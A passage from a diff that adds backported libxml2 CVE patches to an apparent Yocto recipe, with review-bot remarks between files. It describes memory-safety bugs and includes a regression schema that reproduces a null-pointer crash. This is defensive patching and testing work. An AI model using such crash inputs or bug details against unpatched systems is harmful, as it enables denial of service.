+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3459,7 +3465,10 @@ static const xmlChar *
+ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in, *e;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNCName++;
+@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ goto complex;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ const xmlChar *cur = *str;
+ int len = 0, l;
+ int c;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseStringName++;
+@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ COPY_BUF(l,buffer,len,c);
+ cur += l;
+ c = CUR_SCHAR(cur, l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ *str = cur;
+ return(buffer);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNmToken++;
+@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((max > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ COPY_BUF(l,buffer,len,c);
+ NEXTL(l);
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ return(buffer);
+@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ }
+ if (len == 0)
+ return(NULL);
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+ return(NULL);
+ }
+@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int c, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlChar stop;
+ xmlChar *ret = NULL;
+ const xmlChar *cur = NULL;
+@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ GROW;
+ c = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
++ "entity value too long\n");
++ goto error;
++ }
+ }
+ buf[len] = 0;
+ if (ctxt->instate == XML_PARSER_EOF)
+@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ xmlChar *rep = NULL;
+ size_t len = 0;
+ size_t buf_size = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int c, l, in_space = 0;
+ xmlChar *current = NULL;
+ xmlEntityPtr ent;
+@@ -3925,16 +3925,6 @@
+ while (((NXT(0) != limit) && /* checked */
+ (IS_CHAR(c)) && (c != '<')) &&
+ (ctxt->instate != XML_PARSER_EOF)) {
+- /*
+- * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
+- * special option is given
+- */
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+ if (c == 0) break;
+ if (c == '&') {
+ in_space = 0;
+@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ }
+ GROW;
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
++ "AttValue length too long\n");
++ goto mem_error;
++ }
+ }
+ if (ctxt->instate == XML_PARSER_EOF)
+ goto error;
+@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ } else
+ NEXT;
+
+- /*
+- * There we potentially risk an overflow, don't allow attribute value of
+- * length more than INT_MAX it is a very reasonable assumption !
+- */
+- if (len >= INT_MAX) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+-
+ if (attlen != NULL) *attlen = (int) len;
+ return(buf);
+
+@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int cur, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar stop;
+ int state = ctxt->instate;
+ int count = 0;
+@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
+- xmlFree(buf);
+- ctxt->instate = (xmlParserInputState) state;
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
++ xmlFree(buf);
++ ctxt->instate = (xmlParserInputState) state;
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = (xmlParserInputState) state;
+@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar cur;
+ xmlChar stop;
+ int count = 0;
+@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 1 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
+- xmlFree(buf);
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR;
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
++ xmlFree(buf);
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ if (cur != stop) {
+@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ int r, rl;
+ int cur, l;
+ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int inputid;
+
+ inputid = ctxt->input->id;
+@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ if ((r == '-') && (q == '-')) {
+ xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+- "Comment too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ if (len + 5 >= size) {
+ xmlChar *new_buf;
+ size_t new_size;
+@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
++ "Comment too big found", NULL);
++ xmlFree (buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ if (cur == 0) {
+@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t size = XML_PARSER_BUFFER_SIZE;
+ size_t len = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlParserInputState state;
+ const xmlChar *in;
+ size_t nbchar = 0;
+@@ -4958,8 +4975,7 @@ get_more:
+ buf[len] = 0;
+ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+ "Comment too big found", NULL);
+ xmlFree (buf);
+@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t len = 0;
+ size_t size = XML_PARSER_BUFFER_SIZE;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int cur, l;
+ const xmlChar *target;
+ xmlParserInputState state;
+@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ return;
+ }
+ count = 0;
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ }
+ COPY_BUF(l,buf,len,cur);
+ NEXTL(l);
+@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
++ "PI %s too big found", target);
++ xmlFree(buf);
++ ctxt->instate = state;
++ return;
++ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ buf[len] = 0;
+ if (cur != '?') {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ const xmlChar *in = NULL, *start, *end, *last;
+ xmlChar *ret = NULL;
+ int line, col;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ GROW;
+ in = (xmlChar *) CUR_PTR;
+@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ start = in;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ if ((*in++ == 0x20) && (*in == 0x20)) break;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ last = last + delta;
+ }
+ end = ctxt->input->end;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+ }
+ }
+ }
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ col++;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ }
+ }
+ last = in;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ int s, sl;
+ int cur, l;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ /* Check 2.6.0 was NXT(0) not RAW */
+ if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
+@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
+- "CData section too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
+ if (tmp == NULL) {
+ xmlFree(buf);
+@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ }
+ NEXTL(l);
+ cur = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
++ "CData section too big found\n");
++ xmlFree(buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = XML_PARSER_CONTENT;
+--
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
new file mode 100644
index 0000000000..c19726fe9f
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
+From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 31 Aug 2022 22:11:25 +0200
+Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
+ reference cycles
+
+When an entity reference cycle is detected, the entity content is
+cleared by setting its first byte to zero. But the entity content might
+be allocated from a dict. In this case, the dict entry becomes corrupted
+leading to all kinds of logic errors, including memory errors like
+double-frees.
+
+Stop storing entity content, orig, ExternalID and SystemID in a dict.
+These values are unlikely to occur multiple times in a document, so they
+shouldn't have been stored in a dict in the first place.
+
+Thanks to Ned Williamson and Nathan Wachholz working with Google Project
+Zero for the report!
+
+CVE: CVE-2022-40304
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ entities.c | 55 ++++++++++++++++--------------------------------------
+ 1 file changed, 16 insertions(+), 39 deletions(-)
+
+diff --git a/entities.c b/entities.c
+index 84435515..d4e5412e 100644
+--- a/entities.c
++++ b/entities.c
+@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
+ if ((entity->children) && (entity->owner == 1) &&
+ (entity == (xmlEntityPtr) entity->children->parent))
+ xmlFreeNodeList(entity->children);
+- if (dict != NULL) {
+- if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
+- xmlFree((char *) entity->name);
+- if ((entity->ExternalID != NULL) &&
+- (!xmlDictOwns(dict, entity->ExternalID)))
+- xmlFree((char *) entity->ExternalID);
+- if ((entity->SystemID != NULL) &&
+- (!xmlDictOwns(dict, entity->SystemID)))
+- xmlFree((char *) entity->SystemID);
+- if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
+- xmlFree((char *) entity->URI);
+- if ((entity->content != NULL)
+- && (!xmlDictOwns(dict, entity->content)))
+- xmlFree((char *) entity->content);
+- if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
+- xmlFree((char *) entity->orig);
+- } else {
+- if (entity->name != NULL)
+- xmlFree((char *) entity->name);
+- if (entity->ExternalID != NULL)
+- xmlFree((char *) entity->ExternalID);
+- if (entity->SystemID != NULL)
+- xmlFree((char *) entity->SystemID);
+- if (entity->URI != NULL)
+- xmlFree((char *) entity->URI);
+- if (entity->content != NULL)
+- xmlFree((char *) entity->content);
+- if (entity->orig != NULL)
+- xmlFree((char *) entity->orig);
+- }
++ if ((entity->name != NULL) &&
++ ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
++ xmlFree((char *) entity->name);
++ if (entity->ExternalID != NULL)
++ xmlFree((char *) entity->ExternalID);
++ if (entity->SystemID != NULL)
++ xmlFree((char *) entity->SystemID);
++ if (entity->URI != NULL)
++ xmlFree((char *) entity->URI);
++ if (entity->content != NULL)
++ xmlFree((char *) entity->content);
++ if (entity->orig != NULL)
++ xmlFree((char *) entity->orig);
+ xmlFree(entity);
+ }
+
+@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
+ ret->SystemID = xmlStrdup(SystemID);
+ } else {
+ ret->name = xmlDictLookup(dict, name, -1);
+- if (ExternalID != NULL)
+- ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
+- if (SystemID != NULL)
+- ret->SystemID = xmlDictLookup(dict, SystemID, -1);
++ ret->ExternalID = xmlStrdup(ExternalID);
++ ret->SystemID = xmlStrdup(SystemID);
+ }
+ if (content != NULL) {
+ ret->length = xmlStrlen(content);
+- if ((dict != NULL) && (ret->length < 5))
+- ret->content = (xmlChar *)
+- xmlDictLookup(dict, content, ret->length);
+- else
+- ret->content = xmlStrndup(content, ret->length);
++ ret->content = xmlStrndup(content, ret->length);
+ } else {
+ ret->length = 0;
+ ret->content = NULL;
+--
+GitLab
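Review bot: In the `xmlFreeEntity` part of this patch, `entity->URI` is now freed without the `xmlDictOwns` test, although the commit message lists only content, orig, ExternalID and SystemID as no longer dict-allocated. Since this is a backport onto 2.9.10, it is worth confirming that no assignment to `URI`, `orig` or `content` elsewhere in this tree still takes the string from the dict, because an unconditional `xmlFree` on a dict-owned string would corrupt the dict again. A one-line comment above the frees, such as `/* only name may be dict-owned; every other string is heap-allocated */`, would record the invariant. `xmlFreeEntity` begins outside the inner hunk.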
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
new file mode 100644
index 0000000000..907f2c4d47
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
+From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:46:35 +0200
+Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
+
+Fix a null pointer dereference when parsing (invalid) XML schemas.
+
+Thanks to Robby Simpson for the report!
+
+Fixes #491.
+
+CVE: CVE-2023-28484
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ result/schemas/issue491_0_0.err | 1 +
+ test/schemas/issue491_0.xml | 1 +
+ test/schemas/issue491_0.xsd | 18 ++++++++++++++++++
+ xmlschemas.c | 2 +-
+ 4 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 result/schemas/issue491_0_0.err
+ create mode 100644 test/schemas/issue491_0.xml
+ create mode 100644 test/schemas/issue491_0.xsd
+
+diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
+new file mode 100644
+index 00000000..9b2bb969
+--- /dev/null
++++ b/result/schemas/issue491_0_0.err
+@@ -0,0 +1 @@
++./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
+diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
+new file mode 100644
+index 00000000..e2b2fc2e
+--- /dev/null
++++ b/test/schemas/issue491_0.xml
+@@ -0,0 +1 @@
++<Child xmlns="http://www.test.com">5</Child>
+diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
+new file mode 100644
+index 00000000..81702649
+--- /dev/null
++++ b/test/schemas/issue491_0.xsd
+@@ -0,0 +1,18 @@
++<?xml version='1.0' encoding='UTF-8'?>
++<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
++ <xs:complexType name="BaseType">
++ <xs:simpleContent>
++ <xs:extension base="xs:int" />
++ </xs:simpleContent>
++ </xs:complexType>
++ <xs:complexType name="ChildType">
++ <xs:complexContent>
++ <xs:extension base="BaseType">
++ <xs:sequence>
++ <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
++ </xs:sequence>
++ </xs:extension>
++ </xs:complexContent>
++ </xs:complexType>
++ <xs:element name="Child" type="ChildType" />
++</xs:schema>
+diff --git a/xmlschemas.c b/xmlschemas.c
+index 6a353858..a4eaf591 100644
+--- a/xmlschemas.c
++++ b/xmlschemas.c
+@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
+ "allowed to appear inside other model groups",
+ NULL, NULL);
+
+- } else if (! dummySequence) {
++ } else if ((!dummySequence) && (baseType->subtypes != NULL)) {
+ xmlSchemaTreeItemPtr effectiveContent =
+ (xmlSchemaTreeItemPtr) type->subtypes;
+ /*
+--
+GitLab
+
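Review bot: The added `(baseType->subtypes != NULL)` test in `xmlSchemaFixupComplexType` carries no comment saying which schemas reach it, and the branch taken when it is false lies outside the hunk. I would add a comment above the `else if`, for example `/* base type may have no subtypes, see test/schemas/issue491_0.xsd */`, and confirm that the fall-through path leaves `type` in a state the later fixup steps accept. `baseType` itself is dereferenced here with no NULL check in view; presumably it is validated earlier in the function, which begins outside the hunk.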
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
new file mode 100644
index 0000000000..1252668577
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
+From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:49:27 +0200
+Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
+ deterministic
+
+When hashing empty strings which aren't null-terminated,
+xmlDictComputeFastKey could produce inconsistent results. This could
+lead to various logic or memory errors, including double frees.
+
+For consistency the seed is also taken into account, but this shouldn't
+have an impact on security.
+
+Found by OSS-Fuzz.
+
+Fixes #510.
+
+CVE: CVE-2023-29469
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ dict.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/dict.c b/dict.c
+index 86c3f6d7..d7fd1a06 100644
+--- a/dict.c
++++ b/dict.c
+@@ -451,7 +451,8 @@ static unsigned long
+ xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
+ unsigned long value = seed;
+
+- if (name == NULL) return(0);
++ if ((name == NULL) || (namelen <= 0))
++ return(value);
+ value = *name;
+ value <<= 5;
+ if (namelen > 10) {
+--
+GitLab
+
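Review bot: The context line right after the new check, `value = *name;`, overwrites the seed that `value` was initialised with, so in this tree the seed influences only the empty-name key that the patch now returns. The commit message says the seed is taken into account for consistency, which holds for the early return but not for non-empty names as the hunk shows them. If that is intended for this backport, a comment such as `/* the seed only affects the key of an empty name here */` would prevent a wrong assumption about hash randomisation. Otherwise the line would have to read `value += *name;`, which changes every key and goes beyond this fix. The function body continues outside the hunk.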
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
new file mode 100644
index 0000000000..9689cec67d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
+From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 6 May 2023 17:47:37 +0200
+Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
+
